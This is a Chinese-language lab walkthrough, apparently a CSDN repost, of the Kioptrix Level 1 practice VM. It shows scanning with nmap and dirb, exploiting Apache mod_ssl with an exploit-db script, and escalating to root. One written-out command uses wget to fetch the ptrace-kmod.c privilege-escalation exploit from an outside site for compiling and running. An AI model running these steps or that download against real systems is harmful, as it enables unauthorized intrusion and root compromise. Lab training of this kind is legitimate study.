首页 > 其他分享 >oscp学习之路,Kioptix Level1靶场小白速通教程

oscp学习之路,Kioptix Level1靶场小白速通教程

时间:2024-12-19 19:02:17浏览次数:9  
标签:提权 Kioptix 端口 Level1 小白速通 漏洞 靶场 下载 oscp

oscp学习之路,Kioptix Level1靶场小白速通教程

有意向学习oscp的可以私信我一起交流学习

1.前期准备

首先下载好靶场文件,通过nmap进行扫描,确定IP地址和开放端口

发现IP是192.168.201.129,开放的端口为22,80,111,139,443,1024这几个端口。访问IP地址未发现漏洞点,接着对目录进行扫描

dirb url

渗透环节

对页面进行访问,查找漏洞点

在扫描出来的文件路径中发现信息,发现时Apache 1.3.20版本,并且变相提示注意mod_ssl漏洞

利用工具 searchsploit 查找漏洞相关信息和exp相关信息。

确定脚本,到https://www.exploit-db.com/ 下载,搜索mod_ssl

对脚本进行下载编译,然后运行,

成功进入靶场但是还不是管理员权限,需要进行一次提权,提权的方式有很多,这里采用最简单的,直接下载提权脚本

wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

上传完以后成功编译,直接运行,查看权限,提权成功

标签:提权,Kioptix,端口,Level1,小白速通,漏洞,靶场,下载,oscp
From: https://blog.csdn.net/2301_80217770/article/details/144592305

相关文章

  • Kioptix Level 5(0基础教学)
    1.将靶机导入至vm中首先使用nmap命令获取靶机ip,靶机ip为192.168.55.1352.进行端口扫描、目录枚举、指纹识别指纹识别:nmap192.168.55.135-p22,80,8080-sV-sC-O--version-all3.进入靶机网页查看信息访问靶机网页,发现没有有用的信息查看一下源代码,发现......
  • #oscp#渗透测试 kioptix level 3靶机getshell及提权教程
    声明!文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!一、靶机搭建点击扫描虚拟机选择靶机使在文件夹即可二、信息收集前言信息收集阶段,因为这里是靶机,所以不需要做什么,但是实际渗透测试中,大家一定要学会正确的隐藏......
  • oscp备考,oscp系列——Kioptix Level 1~5靶场详解,附重新使用VMware克隆的下载地址,VMwar
    公众号:泷羽Sec-尘宇安全oscp备考,oscp系列——KioptixLevel1~5靶场详解下载地址:https://pan.quark.cn/s/d290014bb3d8oscp备考,oscp系列——KioptixLevel1靶场前言oscp备考,oscp系列——KioptixLevel1靶场KioptixLevel1难度为简单靶场,主要考察nmap的使用已......
  • #渗透测试#红队攻防 kioptix level 2靶机getshell及提权
    声明!文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!目录标题一、准备阶段1.找出ip端口和服务信息扫出ip扫出端口端口对应服务信息2.目录扫描3.漏洞扫描nmap扫描漏洞searchsploit查找漏洞二、获取权限1.访......
  • Kioptix Level 4靶场渗透测试
    声明!学习视频来自B站up主**泷羽sec**有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页[B......
  • 教你如何打穿Kioptrix-Level1靶机
    本篇文章旨在为网络安全初学者介绍渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Kioptrix-Level1靶机有一个初步的了解目录一、信息收集阶段1、扫描网段,发现主机2、扫描主机详细信息(1)22/tcpopensshOpenSSH2.9p2(protocol1.99)(2)80/tcpopenhttpApacheh......
  • 渗透测试-Kioptix Level 1靶机getshell及提权教程
    声明!学习视频来自B站up主泷羽sec有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!工具地址:通过网盘分享的文件:OSCP靶场链接:https:/......
  • 靶场奇妙记之Kioptrix-Level1
    公众号:泷羽Sec-Ceo声明!        学习视频来自B站up主**泷羽sec**有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的......
  • Vulnhub靶机:Kioptrix_Level1.2
    信息收集使用nmap主机发现靶机ipkaliip192.168.134.130扫IP使用nmap端口扫描发现靶机开放端口nmap-A192.168.134.156-p1-65535打开网站,点击login,跳转到登录页面,发现该网站cms为:LotusCMS访问http://192.168.134.156/gallerySQL注入1、发现url中含......
  • xss-labs靶场:level11攻略 抓包工具的巧妙利用
    攻略第十关后稍作休整,我们继续来看第十一关:和上一关一样,提供给我们的仅有的参数是URL中的keyword,很明显,这个参数是无法利用的,我们查看页面源代码发现依然是有一个隐藏表单的存在,但是,我们发现表单中多了一个参数t_ref即<formid="search"><inputname="t_link"value=""t......